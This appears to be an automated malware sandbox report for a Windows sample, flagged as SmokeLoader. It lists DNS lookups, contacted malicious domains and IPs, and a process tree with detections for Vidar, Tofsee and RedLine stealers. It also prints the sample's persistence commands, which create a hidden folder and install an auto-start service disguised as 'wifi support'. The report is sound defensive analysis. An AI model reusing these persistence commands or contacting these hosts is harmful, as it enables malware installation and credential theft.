                                                                                                                      Jan 14, 2022 21:06:29.765475035 CET8.8.8.8192.168.2.50xcbd5No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.765475035 CET8.8.8.8192.168.2.50xcbd5No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.765475035 CET8.8.8.8192.168.2.50xcbd5No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:30.046150923 CET8.8.8.8192.168.2.50xa536No error (0)c9d0e790b353537889bd47a364f5acff43c11f248.xyz185.112.83.97A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:30.232129097 CET8.8.8.8192.168.2.50xd2fbNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:30.232129097 CET8.8.8.8192.168.2.50xd2fbNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:30.232129097 CET8.8.8.8192.168.2.50xd2fbNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:30.232129097 CET8.8.8.8192.168.2.50xd2fbNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:30.232129097 CET8.8.8.8192.168.2.50xd2fbNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:30.473182917 CET8.8.8.8192.168.2.50x9061No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:32.947655916 CET8.8.8.8192.168.2.50xd453No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:34.743685961 CET8.8.8.8192.168.2.50xa787No error (0)github.com140.82.121.4A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:34.869694948 CET8.8.8.8192.168.2.50x332dNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:34.869694948 CET8.8.8.8192.168.2.50x332dNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:34.869694948 CET8.8.8.8192.168.2.50x332dNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:34.869694948 CET8.8.8.8192.168.2.50x332dNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • xmmufccsxa.net
                                                                                                                        • host-data-coin-11.com
                                                                                                                      • ejoocwvno.net
                                                                                                                      • ymxxgm.org
                                                                                                                      • vxhncf.com
                                                                                                                      • csftwsmo.net
                                                                                                                      • fdbmpnrkfj.org
                                                                                                                      • jxeebf.com
                                                                                                                      • kxkku.net
                                                                                                                      • data-host-coin-8.com
                                                                                                                      • fdcyfq.net
                                                                                                                      • lujat.com
                                                                                                                      • ttjdaam.net
                                                                                                                      • uqfbvly.com
                                                                                                                      • privacy-tools-for-you-780.com
                                                                                                                      • hwyvhm.net
                                                                                                                      • idmvulr.net
                                                                                                                      • unicupload.top
                                                                                                                      • vooxhw.org
                                                                                                                      • vvdrjru.com
                                                                                                                      • ubjcetayse.org
                                                                                                                      • sxcrq.org
                                                                                                                      • ywlgtk.net
                                                                                                                      • foglcav.com
                                                                                                                      • hnhyhp.org
                                                                                                                      • nefwc.net
                                                                                                                      • 185.7.214.171:8080
                                                                                                                      • fsakwxty.com
                                                                                                                      • jcjkx.net
                                                                                                                      • lhgju.net
                                                                                                                      • bsjhi.org
                                                                                                                      • bypwmjeu.org
                                                                                                                      • tmxneir.net
                                                                                                                      • ukskogxssc.org
                                                                                                                      • lnvtcbw.net
                                                                                                                      • skipwlik.net
                                                                                                                      • stogr.net
                                                                                                                      • ldxocdirn.net
                                                                                                                      • usarcmaqw.net
                                                                                                                      • drmput.com
                                                                                                                      • wktbs.org
                                                                                                                      • ycnydaydt.net
                                                                                                                      • ymgfpln.net
                                                                                                                      • dxepeeelwv.net
                                                                                                                      • rynnvo.org
                                                                                                                      • kahaurdys.org
                                                                                                                      • ttbac.net
                                                                                                                      • aubfgyajhw.net
                                                                                                                      • ryxvaojf.com
                                                                                                                      • dusqhhm.org
                                                                                                                      • wuqgjbcank.net
                                                                                                                      • rcwmq.org
                                                                                                                      • fgphlloppj.net
                                                                                                                      • fasyb.com
                                                                                                                      • 81.163.30.181
                                                                                                                      • qajnwkj.net
                                                                                                                      • xcbxaaktm.org
                                                                                                                      • 74.201.28.62
                                                                                                                      • pwvhyavumw.com
                                                                                                                      • elaxxedw.com
                                                                                                                      • wfytf.org
                                                                                                                      • phwtttkmh.net
                                                                                                                      • xdhynq.com
                                                                                                                      • kpspxwto.net
                                                                                                                      • fnyafy.net
                                                                                                                      • cwjtumctb.net
                                                                                                                      • psthjovmnc.org
                                                                                                                      • takjt.net
                                                                                                                      • umolln.net
                                                                                                                      • ptkbedc.org
                                                                                                                      • uoymbdayk.org
                                                                                                                      • mqousgs.net
                                                                                                                      • uhxofu.com
                                                                                                                      • gmykjkt.net
                                                                                                                      • quwfn.net
                                                                                                                      • plgevhj.net
                                                                                                                      • jwsdnsli.com

                                                                                                                      Code Manipulations

                                                                                                                      Statistics

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      Analysis Process: OG9rNsihJ7.exe PID: 4948 Parent PID: 5408

                                                                                                                      General

                                                                                                                      Start time:21:04:12
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\Desktop\OG9rNsihJ7.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\OG9rNsihJ7.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      Analysis Process: OG9rNsihJ7.exe PID: 5424 Parent PID: 4948

                                                                                                                      General

                                                                                                                      Start time:21:04:14
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\Desktop\OG9rNsihJ7.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\OG9rNsihJ7.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.298084613.0000000000680000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.298215878.0000000001FA1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low

                                                                                                                      Analysis Process: explorer.exe PID: 3472 Parent PID: 5424

                                                                                                                      General

                                                                                                                      Start time:21:04:21
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                      Imagebase:0x7ff693d90000
                                                                                                                      File size:3933184 bytes
                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.279897390.0000000003031000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: svchost.exe PID: 3756 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:04:24
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: svchost.exe PID: 4840 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:04:25
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: svchost.exe PID: 6092 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:04:35
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: svchost.exe PID: 2600 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:04:36
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: svchost.exe PID: 4568 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:04:36
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: SgrmBroker.exe PID: 2076 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:04:37
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                      Imagebase:0x7ff6999d0000
                                                                                                                      File size:163336 bytes
                                                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: svchost.exe PID: 1188 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:04:37
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: svchost.exe PID: 6656 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:04:42
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: vfgiwcs PID: 6824 Parent PID: 904

                                                                                                                      General

                                                                                                                      Start time:21:04:56
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Roaming\vfgiwcs
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\vfgiwcs
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      Reputation:low

                                                                                                                      Analysis Process: vfgiwcs PID: 6840 Parent PID: 6824

                                                                                                                      General

                                                                                                                      Start time:21:04:58
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Roaming\vfgiwcs
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\vfgiwcs
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.349879535.00000000004A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.349992094.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low

                                                                                                                      Analysis Process: B1B2.exe PID: 6924 Parent PID: 3472

                                                                                                                      General

                                                                                                                      Start time:21:05:00
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\B1B2.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\B1B2.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:301056 bytes
                                                                                                                      MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      Reputation:moderate

                                                                                                                      Analysis Process: svchost.exe PID: 6976 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:05:03
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: BFBD.exe PID: 6984 Parent PID: 3472

                                                                                                                      General

                                                                                                                      Start time:21:05:04
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\BFBD.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\BFBD.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML

                                                                                                                      Analysis Process: WerFault.exe PID: 7020 Parent PID: 6976

                                                                                                                      General

                                                                                                                      Start time:21:05:04
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924
                                                                                                                      Imagebase:0xe40000
                                                                                                                      File size:434592 bytes
                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: BFBD.exe PID: 7140 Parent PID: 6984

                                                                                                                      General

                                                                                                                      Start time:21:05:08
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\BFBD.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\BFBD.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.366966979.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.366989519.00000000004D1000.00000004.00020000.sdmp, Author: Joe Security

                                                                                                                      Analysis Process: svchost.exe PID: 7148 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:05:08
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: WerFault.exe PID: 7156 Parent PID: 6924

                                                                                                                      General

                                                                                                                      Start time:21:05:08
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 520
                                                                                                                      Imagebase:0xe40000
                                                                                                                      File size:434592 bytes
                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: 254E.exe PID: 1268 Parent PID: 3472

                                                                                                                      General

                                                                                                                      Start time:21:05:08
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\254E.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\254E.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:324096 bytes
                                                                                                                      MD5 hash:41AB3EFA04441E560A279BD0F7C0503D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001C.00000002.357794608.000000000081A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML

                                                                                                                      Analysis Process: 3136.exe PID: 5060 Parent PID: 3472

                                                                                                                      General

                                                                                                                      Start time:21:05:12
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\3136.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\3136.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321536 bytes
                                                                                                                      MD5 hash:023802260A0216012A5F00079406D967
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001D.00000002.380383276.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001D.00000003.362218485.00000000007F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001D.00000002.380671348.00000000006C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML

                                                                                                                      Analysis Process: 3BC6.exe PID: 6244 Parent PID: 3472

                                                                                                                      General

                                                                                                                      Start time:21:05:15
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\3BC6.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\3BC6.exe
                                                                                                                      Imagebase:0x650000
                                                                                                                      File size:537088 bytes
                                                                                                                      MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000002.412827478.0000000003991000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 46%, Metadefender, Browse
                                                                                                                      • Detection: 89%, ReversingLabs

                                                                                                                      Analysis Process: cmd.exe PID: 5992 Parent PID: 5060

                                                                                                                      General

                                                                                                                      Start time:21:05:16
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffiawxs\
                                                                                                                      Imagebase:0x150000
                                                                                                                      File size:232960 bytes
                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: conhost.exe PID: 6028 Parent PID: 5992

                                                                                                                      General

                                                                                                                      Start time:21:05:17
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                                      File size:625664 bytes
                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: cmd.exe PID: 1928 Parent PID: 5060

                                                                                                                      General

                                                                                                                      Start time:21:05:17
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\
                                                                                                                      Imagebase:0x150000
                                                                                                                      File size:232960 bytes
                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: conhost.exe PID: 2272 Parent PID: 1928

                                                                                                                      General

                                                                                                                      Start time:21:05:18
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                                      File size:625664 bytes
                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: sc.exe PID: 3532 Parent PID: 5060

                                                                                                                      General

                                                                                                                      Start time:21:05:18
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                      Imagebase:0xa0000
                                                                                                                      File size:60928 bytes
                                                                                                                      MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: conhost.exe PID: 5328 Parent PID: 3532

                                                                                                                      General

                                                                                                                      Start time:21:05:19
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                                      File size:625664 bytes
                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: sc.exe PID: 5500 Parent PID: 5060

                                                                                                                      General

                                                                                                                      Start time:21:05:19
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\System32\sc.exe" description ffiawxs "wifi internet conection
                                                                                                                      Imagebase:0xa0000
                                                                                                                      File size:60928 bytes
                                                                                                                      MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: conhost.exe PID: 5580 Parent PID: 5500

                                                                                                                      General

                                                                                                                      Start time:21:05:20
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff64e5e0000
                                                                                                                      File size:625664 bytes
                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: sc.exe PID: 7068 Parent PID: 5060

                                                                                                                      General

                                                                                                                      Start time:21:05:21
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\sc.exe" start ffiawxs
